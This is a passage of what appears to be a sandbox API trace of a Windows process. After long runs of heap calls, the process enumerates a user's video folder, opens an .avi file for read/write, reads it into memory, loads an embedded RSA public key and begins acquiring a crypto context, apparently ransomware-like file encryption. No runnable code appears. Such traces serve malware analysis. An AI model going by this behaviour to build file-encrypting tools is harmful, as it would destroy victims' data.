Size=0x80) returned 0x67c300 [0203.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0203.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.408] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.408] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.408] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.408] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.409] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.409] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.410] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0203.410] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0203.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0203.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0203.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.434] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\_qbp0nkGuotBuAqg\\") returned="_qbp0nkGuotBuAqg\\" [0203.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0203.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4930 [0203.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.434] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\") returned="vtiS4AAZ_oK\\" [0203.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0203.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4930 | out: hHeap=0x620000) returned 1 [0203.435] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\") returned="z2E0zT\\" [0203.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1f90 [0203.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0203.435] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0203.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1f90 | out: hHeap=0x620000) returned 1 [0203.435] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0203.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0203.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.436] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0203.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0203.436] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0203.436] PathFindFileNameW (pszPath="") returned="" [0203.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.450] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\_qbp0nkGuotBuAqg\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\_qbp0nkguotbuaqg\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5693d200, ftCreationTime.dwHighDateTime=0x1d89993, ftLastAccessTime.dwLowDateTime=0x770b34e0, ftLastAccessTime.dwHighDateTime=0x1d89e13, ftLastWriteTime.dwLowDateTime=0x770b34e0, ftLastWriteTime.dwHighDateTime=0x1d89e13, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0203.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.454] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5693d200, ftCreationTime.dwHighDateTime=0x1d89993, ftLastAccessTime.dwLowDateTime=0x770b34e0, ftLastAccessTime.dwHighDateTime=0x1d89e13, ftLastWriteTime.dwLowDateTime=0x770b34e0, ftLastWriteTime.dwHighDateTime=0x1d89e13, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0203.454] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9199d70, ftCreationTime.dwHighDateTime=0x1d8a528, ftLastAccessTime.dwLowDateTime=0x4b08eb40, ftLastAccessTime.dwHighDateTime=0x1d8a6a5, ftLastWriteTime.dwLowDateTime=0x4b08eb40, ftLastWriteTime.dwHighDateTime=0x1d8a6a5, nFileSizeHigh=0x0, nFileSizeLow=0xda43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="A9pzaRVgIaR.avi", cAlternateFileName="A9PZAR~1.AVI")) returned 1 [0203.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x2ca5e50 [0203.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.455] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\_qbp0nkGuotBuAqg\\A9pzaRVgIaR.avi") returned=".avi" [0203.455] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\_qbp0nkGuotBuAqg\\A9pzaRVgIaR.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\_qbp0nkguotbuaqg\\a9pzarvgiar.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0203.456] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=55875) returned 1 [0203.456] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0203.459] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xda1d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.459] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0203.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.461] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.461] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xda43, lpOverlapped=0x0) returned 1 [0203.462] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0203.462] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.462] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.462] CryptAcquireContextW (in: 